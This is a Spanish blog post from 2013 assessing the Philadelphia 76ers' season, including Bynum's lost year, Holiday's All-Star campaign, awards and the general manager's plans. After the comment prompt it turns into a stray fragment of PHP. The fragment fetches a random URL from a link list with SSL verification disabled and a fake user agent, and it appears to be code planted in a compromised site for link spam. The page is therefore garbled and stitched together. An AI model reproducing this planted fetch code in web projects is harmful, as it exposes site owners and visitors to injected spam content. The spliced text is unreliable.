Philadelphia 76ers: Insuficiente

28 de July de 2013 por Gallis

Empecemos por el principio: Andrew Bynum. Las rodillas y la cabeza del pívot, y no tengo claro que en ese orden, han marcado la temporada de una franquicia que, en menos de 365 días, ha pasado de ser uno de los proyectos más prometedores a convertirse en uno de los claros candidatos  atankear la próxima temporada. Parece casi prehistoria, pero convendría no olvidar que la pasada temporada los 76ers estuvieron a un solo partido de jugar la final del este. Cierto que se beneficiaron de las lesiones de Rose y Noah para eliminar a Chicago, pero llevar a los Celtics a un séptimo partido no es moco de pavo. De ahí que, cuando Tony DiLeo vio la oportunidad, no lo dudó. Pese a deshacerse de Iguodala, Williams, Brand y Vucevic,  la incorporación de Bynum elevaba a los 76ers a una nueva dimensión. La apuesta era arriesgada, pero de salir bien, Philadelphia era, a corto/medio plazo, aspirante a todo. La pena, para la franquicia de la ciudad del amor fraternal, es que la apuesta salió mal. La ansiada vuelta del pívot, prevista para diciembre, se iba retrasando semana tras semana. El ¿jugador? se lesionaba la rodilla sana jugando a los bolos y durante todo el año, parecía más preocupado de lucir nuevos peinados que de recuperarse y ayudar al equipo. Si, llegado el verano, el nuevo General Manager del equipo, Sam Hinkie, tenía dudas sobre la renovación del pívot, imagino que el famoso vídeo de Bynum bailando flamenco en Madrid, las disipó por completo. Las palabras de Julius Erving pusieron punto final a esta etapa de los Sixers. 

A pesar de todo, Philadelphia ha demostrado ser un equipo con orgullo. La baja de Bynum podría haber empujado a la franquicia a dejarse llevar, pero hasta casi la última semana estuvieron luchando por llegar a los playoffs, sitio en el que todos les colocaban a principio de temporada. Buena parte de la culpa la tiene Jrue Holiday. El ya jugador de los Pelicans, se olvidó de su decepcionante temporada pasada y, pese a su irregularidad, asumió los galones de equipo. Su buena temporada le valió para acudir al All Star de Houston.

Holiday no ha sido la única buena noticia de Philadelphia esta temporada. Otros 2 jugadores han cumplido e incluso superado las expectativas. Son Evan Turner y Thaddeus Young. Turner ha sido el único jugador capaz de ser titular los 82 partidos, lo cual en estos Sixers es algo a tener en cuenta. Pese a que se podría haber esperado algo más de él, Evans ha mejorado todas sus estadísticas y debería ser, en su cuarto año en la liga, el faro al que se agarren todos los aficionados dePhilly. La sorpresa más agradable ha sido Thaddeus Young. Tras 2 años un tanto erráticos, esta temporada parecía decisiva para él: dar el salto o estancarse como un jugador correcto, sin más. Y la verdad es que, con su rendimiento, Young ha demostrado que hay jugador para rato y que, al menos, los Sixers tienen una cosa menos de la que preocuparse.

Por lo demás, Hawes ha demostrado un año más ser un jugador muy regular y Nick Young ha demostrado un año más, justo lo contrario. Doug Collins abandona el banquillo de Philly con luces y sombras. Su trabajo ha estado muy condicionado por las lesiones (por nombrar otra, Jason Richardson apenas ha podido jugar 33 partidos, aunque está por ver que eso sea malo), pero quizá la ambición de intentar jugar playoff a toda costa, le llevo a dar menos minutos de los esperados a Lavoy Allen o Justin Holiday.

La temporada acaba como empezó, apostando. Esta vez por Nerlens Noel. De nuevo las esperanzas de la franquicia recaen sobre una rodilla maltrecha, pero esta vez queda la esperanza de que la cabeza de Noel esté mejor amueblada que la de Bynum. De momento, la intención del jugador es buena. Su elección de dorsal (el 5, para no olvidar el número de equipos que le dejaron pasar en el draft) refleja una ambición y unas ganas de jugar que hace mucho que no se detectan en Bynum. A corto plazo hay poco que hacer, pero, si los médicos están más acertados esta vez, quizá a medio plazo el futuro de los Philadelphia 76ers pueda volver a ser esperanzador.

PREMIOS

MVP: Jrue Holiday. Como ya hemos dicho, el nuevo base de los Pelicans ha sido sin duda el mejor jugador de los Sixers esta temporada. Mejoró en casi todas las estadísticas, firmando 18 puntos, 8 asistencias y más de 4 rebotes por partido. Un nivel que le llevo al All Star de Houston.

Decepción:Andrew Bynum. Para más información, releer el primer párrafo.

Sorpresa: Como decíamos antes, Thaddeus Young afrontaba una temporada crucial. Nunca dejo de ser importante en los Sixers, pero poco a poco, temporada a temporada, cada vez tenía menos impacto en el juego del equipo. Este año ha dado un paso adelante y ha demostrado ser un titular de garantías. Casi 15 puntos, 7,5 rebotes, casi 2 robos y un 53% en tiros de campo, así lo atestiguan.

Esfuerzo en vano: De nuevo, tenemos que hablar de Andrew Bynum. Pese a sus esfuerzos por acabar su carrera en la NBA, Cleveland le acaba de firmar un nuevo contrato. Ya lo intentó en los Lakers, cuando en 2010 retrasó su operación de rodilla más de 2 meses para acudir al mundial de Sudáfrica. Este año, desde luego, ha hecho todo lo posible por no recuperarse y, pese a todo, otro equipo ha apostado por él. Estaremos atentos…

JUGANDO A GM

Es difícil ponerse en la piel de Sam Hinkie pero parece claro que el nuevo GM de Philadelphia tiene un plan. Eso sí, lo que todavía no tiene es entrenador, así que habrá que empezar por ahí. Una vez que el banquillo esté ocupado, quedará completar la plantilla, pero no creo que Hinkie dedique muchos esfuerzos a esa labor. Quizá sus mayores esfuerzos se centren en conseguir algún agente libre con experiencia, para ayudar al crecimiento de gente como Turner o Young. El resto, rellenar la plantilla sin comprometer masa salarial. Poco más. Precisamente Turner debe convertirse en el líder y Philadelphia querrá asegurarse el espacio salarial necesario para renovarle.

Por lo demás, será una temporada en la que el sufrimiento de los aficionados se verá mitigado en función del desarrollo de los rookies. Si Noel se recupera de su lesión y da muestras de que podría haber sido un número 1 del draft y si Michael Carter Williams rinde, Hinkie se habrá ganado el sueldo, a la espera del esperadísimo draftdel 2014, en el que Philadelphia tendrá, probablemente, una buena elección.

Comenta

Un comentario a esta entrada

  1. risax mj dice:
    #1

    Bynum deja el basket. Por favor

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>